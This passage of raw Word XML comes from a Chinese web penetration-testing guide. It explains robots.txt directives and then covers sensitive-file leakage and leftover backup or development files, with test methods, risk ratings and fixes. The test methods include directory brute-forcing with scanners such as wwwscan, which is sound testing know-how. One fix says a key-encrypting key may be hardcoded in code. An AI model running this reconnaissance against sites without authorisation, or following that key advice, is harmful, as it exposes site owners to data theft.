      </w:r>
    </w:p>
    <w:p w14:paraId="5C991A69" w14:textId="77777777" w:rsidR="00083665" w:rsidRPr="00657454" w:rsidRDefault="00083665" w:rsidP="00E9007A">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Allow: /cgi-bin/</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　这里定义是允许爬寻</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cgi-bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下面的目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78971E75" w14:textId="70BC9211" w:rsidR="00083665" w:rsidRPr="00657454" w:rsidRDefault="00083665" w:rsidP="00E9007A">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Allow: /tmp </w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里定义是允许爬寻</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的整个目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5878796B" w14:textId="0D3C8B5E" w:rsidR="00083665" w:rsidRPr="00657454" w:rsidRDefault="00083665" w:rsidP="00E9007A">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Allow: .htm$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仅允许访问以</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>".htm"</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为后缀的</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D6F516" w14:textId="66BB4BEB" w:rsidR="00083665" w:rsidRPr="00657454" w:rsidRDefault="00083665" w:rsidP="00E9007A">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Allow: .gif$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许抓取网页和</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gif</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式图片</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71850017" w14:textId="3A5C6E1B" w:rsidR="00083665" w:rsidRPr="00657454" w:rsidRDefault="00083665" w:rsidP="00E9007A">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Sitemap: </w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网站地图</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>告诉爬虫这个页面是网站地图。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D2ACE5" w14:textId="2DF68100" w:rsidR="001677B8" w:rsidRPr="00657454" w:rsidRDefault="00106614" w:rsidP="00E9007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308C740" w14:textId="442465E8" w:rsidR="00D21E1F" w:rsidRPr="00F36038" w:rsidRDefault="001854F4" w:rsidP="001365A8">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="127"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc498434472"/>
      <w:r w:rsidRPr="00F36038">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>敏感文件信息泄漏</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="5B81FEE6" w14:textId="21425166"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="005C46F6" w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>敏感数据包括但不限于：口令、密钥、证书、会话标识、</w:t>
      </w:r>
      <w:r w:rsidR="005C46F6" w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>License</w:t>
      </w:r>
      <w:r w:rsidR="005C46F6" w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、隐私数据（如短消息的内容）、授权凭据、个人数据（如姓名、住址、电话等）等，在程序文件、配置文件、日志文件、备份文件及数据库中都有可能包含敏感数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251CA482" w14:textId="77777777"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测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAFBDFA" w14:textId="77777777" w:rsidR="009E2725" w:rsidRPr="00657454" w:rsidRDefault="009E2725" w:rsidP="00E9007A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测形式多样，工具爬虫扫描得到敏感文件的路径，从而找到敏感数据，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DFD8BB" w14:textId="5FEA18C4" w:rsidR="00D21E1F" w:rsidRPr="00657454" w:rsidRDefault="009E2725" w:rsidP="00E9007A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>手工挖掘，根据</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器或者网页源代码的查看，找到敏感信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6CEC0F" w14:textId="55570B1A" w:rsidR="00D21E1F" w:rsidRPr="00657454" w:rsidRDefault="00A7326F" w:rsidP="00E9007A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析：</w:t>
      </w:r>
      <w:r w:rsidR="00CF05BD" w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可通过上述方式获取网站敏感文件，收集网站敏感信息，从而有针对性的进行利用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA8C4BC" w14:textId="77777777"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41900623" w14:textId="0AAFB63F" w:rsidR="00D21E1F" w:rsidRPr="00657454" w:rsidRDefault="007206DA" w:rsidP="00E9007A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：返回含有重要的敏感信息的文件，比如数据库文件、代码的备份文件或</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>svn</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本控制文件等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D483C23" w14:textId="77777777"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修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E8BE50"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代码中存储敏感数据：禁止在代码中存储如数据库连接字符串、口令和密钥之类的敏感数据，这样容易导致泄密。用于加密密钥的密钥可以硬编码在代码中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D9CB72"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密钥或帐号的口令以明文形式存储在数据库或者文件中：密钥或帐号的口令必须经过加密存储。例外情况，如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器的配置文件中只能以明文方式配置连接数</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>据库的用户名和口令，那么就不用强制遵循该规则，将该配置文件的属性改为只有属主可读写。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5E99B9"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w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> cookie </w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中以明文形式存储敏感数据：</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息容易被窃取，尽量不要在</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中存储敏感数据；如果条件限制必须使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储敏感信息时，必须先对敏感信息加密再存储到</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3C28B8"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隐藏域中存放明文形式的敏感数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF304DE"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用自己开发的加密算法，必须使用公开、安全的标准加密算法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9A3F1D" w14:textId="77777777" w:rsidR="00CC10BE"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日志中记录明文的敏感数据：禁止在日志中记录明文的敏感数据（如口令、会话标识</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jsessionid</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等），</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防止敏感信息泄漏。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215B34E4" w14:textId="6EA76BA6" w:rsidR="00D21E1F"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带有敏感数据的</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面缓存：带有敏感数据的</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面都应该禁止缓存，以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCF6871" w14:textId="21B46E2E" w:rsidR="00AA4B44" w:rsidRPr="00AA4B44" w:rsidRDefault="00AA4B44" w:rsidP="00E9007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9B4EFF1" w14:textId="398EC540" w:rsidR="00757422" w:rsidRPr="00F36038" w:rsidRDefault="00757422" w:rsidP="001365A8">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="127"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc498434473"/>
      <w:r w:rsidRPr="00F36038">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过时的、用于备份的或者开发文件残留</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="2811AD79" w14:textId="18BF42BC" w:rsidR="00757422" w:rsidRPr="003567BE" w:rsidRDefault="00757422" w:rsidP="00E9007A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00E63E3C" w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用遗留的过时文件、备份页面、渗透测试遗留文件、开发文件残留的测试文件等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4938BA32" w14:textId="77777777" w:rsidR="00757422" w:rsidRPr="003567BE" w:rsidRDefault="00757422" w:rsidP="00E9007A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4824BF8B" w14:textId="77777777" w:rsidR="005E0194" w:rsidRPr="003567BE" w:rsidRDefault="005E0194" w:rsidP="00E9007A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常见检测方法是通过对网站进行</w:t>
      </w:r>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞扫描，直接利用爬虫来爬取网站可能存在的路径以及链接，如果存在备份文件，则可通过</w:t>
      </w:r>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接进行下载。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204BF5B2" w14:textId="262A2056" w:rsidR="00757422" w:rsidRPr="003567BE" w:rsidRDefault="005E0194" w:rsidP="00E9007A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可以通过自行构造字典，对网站某一目录下，指定字典进行爆破，常见的扫描工具有</w:t>
      </w:r>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>www</w:t>
      </w:r>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>scan</w:t>
      </w:r>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、御剑后台扫描工具等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD98B9B" w14:textId="6442DBA2" w:rsidR="00757422" w:rsidRPr="003567BE" w:rsidRDefault="00F33033" w:rsidP="00E9007A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析：</w:t>
      </w:r>
      <w:r w:rsidR="0070465F" w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可通过上述方式获取网站备份文件、过时文件、遗留文件等内容，收</w:t>
      </w:r>
      <w:r w:rsidR="0070465F" w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
